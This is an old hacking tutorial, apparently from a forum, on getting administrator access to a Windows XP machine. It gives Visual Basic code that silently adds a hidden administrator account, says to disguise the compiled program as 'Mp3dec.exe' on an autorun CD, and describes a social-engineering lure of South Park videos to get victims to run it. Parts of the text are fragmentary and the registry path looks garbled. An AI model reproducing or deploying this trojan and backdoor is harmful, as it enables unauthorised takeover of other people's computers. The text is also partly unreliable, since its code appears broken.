|
|
|
|
|
|
|
Get Admin Access On xp by h43k4z This is the only reliable way I have been able to come up with since trying for as long as I can remember. It includes social engineering and a little programming, but it is achieved in the end. First I will give you an overview of what we are really doing k
And that should be it ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''cut here On Error Resume Next 'very important (no errors will pop up on screen) pass = "yourpass" 'change to what you want usr = "yourusr" 'change to what you want Shell "net user " & usr & " " & pass & " /add", vbHide 'the net user command you should know this Sleep 1000 'i place this here cause sometimes the first command is not completed when this is ran, and that 'should not happen one then the other Shell "net localgroup administrators " & usr & " /add", vbHide 'this makes you admin :) Dim value As Long 'this is to set the dword value of the registry must be long or integer value = 0 '0 to hide 1 to show result = RegOpenKey(HKEY_LOCAL_MACHINE, "SOFTWARENT", keyres) 'opening the reg key result = RegSetValueEx(keyres, usr, 0, 4, value, Len(value)) 'Writing the reg key SetAttr "C:\Documents and Settings\" & usr, vbHidden 'set your settings folder as hidden end 'i put this here to make sure the program ends immediately End Sub ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''cut to here That should be it just compile that and name it something sneaky like Mp3dec.exe or something like that. Burn To cd you will have to write a autorun.inf file for the cd to autorun when it is placed in the cd rom, this is simple open notepad and type or copy and paste these lines [autorun] open = Mp3dec.exe.exe icon = none.ico
NOTE MP3DEC.EXE AUTORUN.INF AND ICON.ICO WILL BE HIDDEN (you can do that right) right click.............. Let The cd Appeal To The User This is straight forward but very important, this is where social engineering
comes in, lets say the victim likes south park then you get your self some south
park videos from kazaa (lol) put it in a folder on the cd named south park
episodes, Conclusion ANOTHER NOTE YOU HAVE TO HOLD CTRL +ALT AND PRESS DEL TWICE AT THE LOGIN SCREEN TO USE YOUR ACCOUNT. h43k4z |
|
|